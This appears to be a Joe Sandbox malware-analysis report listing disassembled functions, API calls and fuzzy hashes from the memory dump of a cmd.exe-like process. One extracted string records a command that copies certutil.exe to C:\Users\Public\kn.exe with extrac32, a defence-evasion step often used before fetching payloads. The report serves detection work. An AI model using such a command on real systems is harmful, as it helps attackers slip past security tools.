Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: iswdigit$_errnoiswalphawcschrwcstol
String ID: +-~!$APerformUnaryOperation: '%c'
API String ID: 2348642995-441775793
Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
Instruction ID: 250388e4f5bbae883bac570317bfbbe3c22baf96d42bca5b23e67358151652af
Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
Instruction Fuzzy Hash: 09715D62948B46C5E7685F22D41217D77A0FF49B84B58C03ADB5EA7394EF3CA484C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F79400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F79462
memset.MSVCRT ref: 00007FF683F79485
memset.MSVCRT ref: 00007FF683F794AA

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F8B6A9

Part of subcall function 00007FF683F85EE4: memset.MSVCRT ref: 00007FF683F85F5D
Part of subcall function 00007FF683F85EE4: towupper.MSVCRT ref: 00007FF683F85FFE
Part of subcall function 00007FF683F85EE4: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F86029

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F795D3
_wcsicmp.MSVCRT ref: 00007FF683F79603
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7963D
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7965C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8B67A

Strings

FAT, xrefs: 00007FF683F795F8
~, xrefs: 00007FF683F794BE

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
String ID: FAT$~
API String ID: 2238823677-1832570214
Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
Instruction ID: d2024b797ff8b3ea1095c5f438381cd9e5a41bb7cafe0493c4ba65f0b54bd1a7
Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
Instruction Fuzzy Hash: A0719D32609BC1CAEB658F2198512EA77A0FF45788F488139DA4DABB58DF3CD645C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF683F7FE2A), ref: 00007FF683F7D884
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF683F7FE2A), ref: 00007FF683F7D89D
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF683F7FE2A), ref: 00007FF683F7D94D
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF683F7FE2A), ref: 00007FF683F7D964
_wcsnicmp.MSVCRT ref: 00007FF683F7DB89
wcstol.MSVCRT ref: 00007FF683F7DBDF
wcstol.MSVCRT ref: 00007FF683F7DC63
memmove.MSVCRT ref: 00007FF683F7DD33
memmove.MSVCRT ref: 00007FF683F7DE9A
longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF683F7FE2A), ref: 00007FF683F7DF1F

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
String ID:
API String ID: 1051989028-0
Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
Instruction ID: 0ef391fe228f5de255c5639c93006e3f4d63d8fb68dac4900b629d336aed24e8
Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
Instruction Fuzzy Hash: A5029372A097C1C2EA249F15E44127976B1FF84B94F9C4239EA8DA7794DFBCE441C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F786B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F78711
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F78729
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F78748
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7875F
_wcsicmp.MSVCRT ref: 00007FF683F78805
_wcsicmp.MSVCRT ref: 00007FF683F7881F
_wcsicmp.MSVCRT ref: 00007FF683F78839

Strings

DISABLEDELAYEDEXPANSION, xrefs: 00007FF683F8B366
ENABLEEXTENSIONS, xrefs: 00007FF683F787FB
ENABLEDELAYEDEXPANSION, xrefs: 00007FF683F7882F
DISABLEEXTENSIONS, xrefs: 00007FF683F78815

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$_wcsicmp$AllocProcess
String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
API String ID: 3223794493-3086019870
Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
Instruction ID: 1903138a4f44f0d1e4ac8d38cf7c02ba7554cf7b49aef26f42d3ec95d7711cad
Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
Instruction Fuzzy Hash: 7A519D61A09B82C6EB149B15E8121797BA0FF49B90F5C913DCA5EA73A0EF3CE441C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

GTR, xrefs: 00007FF683F82CD0
LEQ, xrefs: 00007FF683F82CB6
EQU, xrefs: 00007FF683F82C6B
LSS, xrefs: 00007FF683F82C9C
NEQ, xrefs: 00007FF683F82C82
GEQ, xrefs: 00007FF683F82D38

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID:
String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
API String ID: 0-3124875276
Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
Instruction ID: ee75f522d4e63d2b3984d4c6a572922a22ebadb16637c6121fc2c8d8f9461e35
Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
Instruction Fuzzy Hash: E7517E21A4C643D2FB189F22A4062B96BA5BF45B4AF48403DDA1EE73A5DF3CB405C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9BFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF683F9C6DB), ref: 00007FF683F858EF

Part of subcall function 00007FF683F8081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F8084E

towupper.MSVCRT ref: 00007FF683F9C1C9
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9C31C
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF683F9C5CB

Strings

%s , xrefs: 00007FF683F9C3D6
Unknown, xrefs: 00007FF683F9C3AB
\, xrefs: 00007FF683F9C30F
x, xrefs: 00007FF683F9C36B
%s>, xrefs: 00007FF683F9C684
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF683F9C003
PROMPT, xrefs: 00007FF683F9C079

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
String ID: %s $%s>$PROMPT$Unknown$\$extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
API String ID: 2242554020-2739816274
Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
Instruction ID: bae0aa2fdb51a95dc30a1501e2735d3c3eb91975dad7955bf9aaf671c59995cf
Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
Instruction Fuzzy Hash: 6012C521A08652C1EA649F15A44667A67A0FF44BA4F5C433EDEAEE37E0DF3CE541C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F86FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F87013

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F87123

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8706E
wcsncmp.MSVCRT ref: 00007FF683F870A5
wcsstr.MSVCRT ref: 00007FF683F8F9DB
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8FA00
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8FA5F

Part of subcall function 00007FF683F8823C: FindFirstFileExW.KERNELBASE ref: 00007FF683F88280
Part of subcall function 00007FF683F8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8829D

Part of subcall function 00007FF683F83A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F9EAC5,?,?,?,00007FF683F9E925,?,?,?,?,00007FF683F7B9B1), ref: 00007FF683F83A56

GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8FA3D

Strings

\\.\, xrefs: 00007FF683F87097

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
String ID: \\.\
API String ID: 799470305-2900601889
Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
Instruction ID: 788cf40e413da003c2b6ca217475c05070c6038f0565aed2ad6623a04c05d3b1
Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
Instruction Fuzzy Hash: 1A51D932A48B82C5EB649F12E8022B977A0FF89B94F4D5539DA0DA7B94DF3CD545C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F78B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON

Download Yara Rule

APIs

wcsrchr.MSVCRT ref: 00007FF683F78BAB
_wcsicmp.MSVCRT ref: 00007FF683F78BD4
_wcsicmp.MSVCRT ref: 00007FF683F78BF2
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F78C16
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F78C2F
wcschr.MSVCRT ref: 00007FF683F78CB3
wcschr.MSVCRT ref: 00007FF683F78CD7

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
String ID:
API String ID: 1944892715-0
Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
Instruction ID: 0e0f2f61d88d2c6e0848a8c3d2e1ec37e3f899cab6fba605bd92372184d6c53f
Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
Instruction Fuzzy Hash: FCB18F61A09682C6EA649F12E857179B6A1FF59B84F4C853DCA4EE7391DF7CE840C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F75458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F83578: _get_osfhandle.MSVCRT ref: 00007FF683F83584
Part of subcall function 00007FF683F83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F8359C
Part of subcall function 00007FF683F83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835C3
Part of subcall function 00007FF683F83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835D9
Part of subcall function 00007FF683F83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835ED
Part of subcall function 00007FF683F83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F83602

_get_osfhandle.MSVCRT ref: 00007FF683F754DE
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF683F71F7D), ref: 00007FF683F7552B
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF683F71F7D), ref: 00007FF683F7554F
_get_osfhandle.MSVCRT ref: 00007FF683F9345F
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF683F71F7D), ref: 00007FF683F9347E
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF683F71F7D), ref: 00007FF683F934C3
_get_osfhandle.MSVCRT ref: 00007FF683F934DB
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF683F71F7D), ref: 00007FF683F934FA

Part of subcall function 00007FF683F836EC: _get_osfhandle.MSVCRT ref: 00007FF683F83715
Part of subcall function 00007FF683F836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F83770
Part of subcall function 00007FF683F836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F83791

Part of subcall function 00007FF683F7566C: wcschr.MSVCRT ref: 00007FF683F75690

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
String ID:
API String ID: 1356649289-0
Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
Instruction ID: 70d295d762157b37e5954f41554291fbcabc1453c743130c45baff329612d12e
Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
Instruction Fuzzy Hash: 32915D72A08642D7EA249F25A402579B7A5FF88B94F5C413EDE4EA7794DF3CE440CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F986FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F9883F
GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F9897A
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F989AC
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F989BD
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F989D1

Strings

%s, xrefs: 00007FF683F988B9
:, xrefs: 00007FF683F987B7
/-., xrefs: 00007FF683F9873E

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: LocalTime$ErrorLast_get_osfhandle
String ID: %s$/-.$:
API String ID: 1644023181-879152773
Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
Instruction ID: ea29bdb454e66c4977a0728989d2db8cc4614a3ff1abd01647cb042bb9dd29e9
Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
Instruction Fuzzy Hash: 4A91B262A08642D5EF149F25D4422BA67A0FF84B84F8C453ADE4EE36D4EE3CE545C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF683F97251), ref: 00007FF683F9628E

Strings

wil, xrefs: 00007FF683F963D2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
Instruction ID: 0639a084ce4e665c258bf3791d0f4e3de9e7fb1433e84a83f40fef1596213334
Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
Instruction Fuzzy Hash: 81414D21A0C642C3F7604F15E44267976A2FF8A7A5F688139ED49E7BD4CF3DE844C681

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F9CE20
_ultoa.MSVCRT ref: 00007FF683F9CE43
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F9CE4F
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF683F9CE84
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F9CEDE
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF683F9CF24

Strings

Application, xrefs: 00007FF683F9CEAB
System, xrefs: 00007FF683F9CE90
, xrefs: 00007FF683F9CE64

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
String ID: $Application$System
API String ID: 3377411628-1881496484
Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
Instruction ID: a365ab05c0bbc452c8c65530c34277a49b9b97cf10190283a1ce5896f4758fae
Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
Instruction Fuzzy Hash: A5410832B18A42DAEB109F61E4413ED77A5FB89748F48513ADA4EA3B98DF3CD145C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F714E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00007FF683F71829), ref: 00007FF683F71513
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00007FF683F71829), ref: 00007FF683F7152B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8AB0F
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8AB29
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8AB4E
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F8AB65

Strings

\, xrefs: 00007FF683F8AAFC
:, xrefs: 00007FF683F8AAF0

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
